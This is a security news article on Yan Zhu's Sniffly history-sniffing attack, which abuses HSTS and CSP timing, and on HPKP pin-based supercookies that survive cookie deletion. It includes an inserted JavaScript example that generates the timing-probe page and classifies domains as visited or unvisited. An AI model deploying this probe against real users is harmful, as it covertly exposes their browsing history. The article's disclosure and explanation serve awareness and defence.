A researcher has demonstrated two unpatched flaws that can be exploited to track millions of Internet users, allowing malicious website owners:
- List Building: To compile a list of domains a user has visited, even if the user has cleared their browsing history
- Tracking Cookies: To tag users with a tracking identifier that persists even after they have deleted all cookies
These two browser fingerprinting techniques abuse HTTP Strict Transport Security (HSTS), Content Security Policy (CSP) and HTTP Public Key Pinning (HPKP), security features already built into Mozilla Firefox and Google Chrome and expected to make their way into other mainstream browsers in the near future.
What if website owners turn these security features against you?
A security researcher demonstrated exactly that last weekend at the Toorcon security conference in San Diego.
Yan Zhu, an independent security researcher, showed how websites can abuse HSTS and Content Security Policy to track even the most paranoid user, letting a site sniff which domains that user has previously visited.
Yes, despite the 'Strict' and 'Security' in its name, HTTP Strict Transport Security (HSTS) can be abused to keep track of you whenever you visit a website, even though its purpose is to make your communication with that site more secure.
Hard to Believe?
Visit this web page http://zyan.scripts.mit.edu/sniffly/ yourself in Chrome, Firefox, or Opera and you will probably end up with an accurate list of websites you have and have not visited.
How Does Sniffly Work?
The exploit page embeds non-existent images from a long list of HSTS-protected domains, each requested over plain HTTP, under a Content Security Policy that only permits images loaded over HTTP.
If you have visited one of those HSTS sites before, your browser already holds its HSTS entry and rewrites the image URL to HTTPS internally; the CSP then blocks the request before any connection is opened, so the image error fires within a few milliseconds. If you have never visited the site, the browser actually sends the HTTP request over the network, and the error arrives noticeably later.
Measuring that timing difference for each domain gives a quick list of which HSTS-protected sites a user has and hasn't visited.
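The two halves of that timing probe, written here as an added example (this is not Sniffly's own code): a generator for the probe page that runs in the visitor's browser, and the analysis that turns recorded timings into a visited / unvisited split. The CSP value, probe path, control-domain calibration and sample timings are assumptions for illustration.

```javascript
// Added example, not Sniffly's own code. HSTS timing probe as the article
// describes it; CSP value, probe path and thresholds are assumptions.
const PROBE_CSP = "img-src http://*"; // permit only http: image loads (assumed)

// Browser half: build the page that runs in the visitor's browser. Each candidate
// domain gets an <img> pointed at a non-existent http:// URL. If the browser holds
// an HSTS entry for the domain it rewrites the URL to https:// internally and the
// CSP blocks it before any socket opens, so onerror fires in a few ms. Otherwise a
// real HTTP request goes out and the error only arrives after DNS and TCP.
// Note: later CSP revisions let an http: source match https: URLs, which removes
// this instant-block signal.
function buildProbePage(domains) {
  const probes = domains.map((domain) => {
    const d = JSON.stringify(domain);
    return `(function () {
      var start = performance.now();
      var img = new Image();
      img.onerror = img.onload = function () {
        results[${d}] = performance.now() - start;
      };
      img.src = "http://" + ${d} + "/sniffly-probe-" + Math.random() + ".png";
    })();`;
  }).join("\n");
  return [
    "<!doctype html>",
    `<meta http-equiv="Content-Security-Policy" content="${PROBE_CSP}">`,
    "<script>",
    "var results = {};",
    probes,
    "</script>",
  ].join("\n");
}

// Analysis half. The cut-off between "blocked instantly" and "went to the
// network" varies per client, so derive it from two control domains measured on
// the same page: one the attacker knows the browser has an HSTS entry for (fast)
// and one known never to set HSTS (slow). Geometric mean = midpoint on a log scale.
function thresholdFromControls(fastControlMs, slowControlMs) {
  return Math.sqrt(fastControlMs * slowControlMs);
}

// timings: { domain: milliseconds until onerror/onload }
function classifyTimings(timings, thresholdMs) {
  const visited = [];
  const unvisited = [];
  for (const [domain, ms] of Object.entries(timings)) {
    (ms < thresholdMs ? visited : unvisited).push(domain);
  }
  return { visited: visited.sort(), unvisited: unvisited.sort() };
}

// Constructed sample run (no network): timings as a browser might report them.
const sampleTimings = { "bank.example": 2.4, "shop.example": 138.0, "mail.example": 3.1 };
const sampleResult = classifyTimings(sampleTimings, thresholdFromControls(2, 200));
```

The page generator is only a string builder here so the whole file runs under Node; in a real deployment the page is served to the visitor and `results` is posted back to the attacker's server, where `classifyTimings` runs. Everything hinges on the browser's own HSTS cache, so the list survives a cleared history.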
Zhu developed this proof-of-concept attack site, which she has dubbed Sniffly, to showcase the attack, and has posted its source code on GitHub. You can also watch the video of her presentation below.
Certificate Pinning Tracks You even after Deleting Cookies
Besides tracking browser history, Zhu also demonstrated how a website can track Google Chrome users even if they delete all cookies after every visit.
Instead of exploiting HSTS, the 'Supercookie' technique abuses weaknesses in HTTP public key pinning (HPKP), also known as Certificate Pinning.
HPKP is a security measure designed to protect users against forged certificates: a website sends hashes of the public keys it expects in its certificate chain, and the browser remembers them and later refuses any chain that does not contain one of those keys, rather than accepting a certificate from any of the hundreds of built-in root certificates.
The supercookie technique abuses the standard by setting pins in a pattern unique to each visitor. On later visits the site checks which of its pinned resources the browser still accepts, reads the pattern back, and uses it as an identifier exactly as it would use a browser cookie to track the user's browsing habits.
However, unlike a browser cookie, the certificate pins remain in place even after cookies are deleted.
The history-sniffing attack has limits in its current form: it records only domains and subdomains, not full URLs, and it can only detect visits to HSTS-protected sites.
Its results are also inaccurate for people using the HTTPS Everywhere browser plugin, since that extension rewrites HTTP requests to HTTPS much as HSTS does. Such shortcomings can likely be overcome with further code refinements.
For in-depth details, head over to the PDF slides.